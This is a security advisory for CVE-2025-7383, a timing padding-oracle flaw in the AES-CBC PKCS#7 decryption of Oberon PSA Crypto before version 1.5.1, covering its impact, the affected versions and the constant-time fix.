Key Information CVE ID: CVE-2025-7383 Title: Timing side-channel vulnerability in AES-CBC decryption with PKCS#7 padding in Oberon PSA Crypto Severity: medium Short Description A padding oracle attack vulnerability exists in Oberon microsystem AG's Oberon PSA Crypto library in all versions from 1.0.0 up to and excluding 1.5.1. This allows an attacker to recover plaintexts by measuring timing differences during AES-CBC PKCS#7 decryption operations. Vulnerability Oberon PSA Crypto is vulnerable to a timing side-channel attack due to its non-constant-time implementation of PKCS#7 padding removal. The AES-CBC decryption code (function in and a corresponding driver function in ) exhibits timing differences between "no padding error" and "padding error" cases. An attacker capable of sending thousands of ciphertexts as probes can exploit these timing variations to first determine the actual message length, and then recover the message content byte by byte. All clients using AES-CBC with PKCS#7 padding are affected. Impact Complete recovery of plaintext data. Affected Versions The vulnerability affects all versions of Oberon PSA Crypto from 1.0.0 to 1.5.0, inclusive. Resolution As a partial mitigation, the code was updated to be constant-time in release 1.5.1. Affected clients should upgrade to this version. A complete mitigation is beyond the scope of Oberon PSA Crypto and requires clients to validate the integrity of decrypted messages using application-specific, constant-time methods.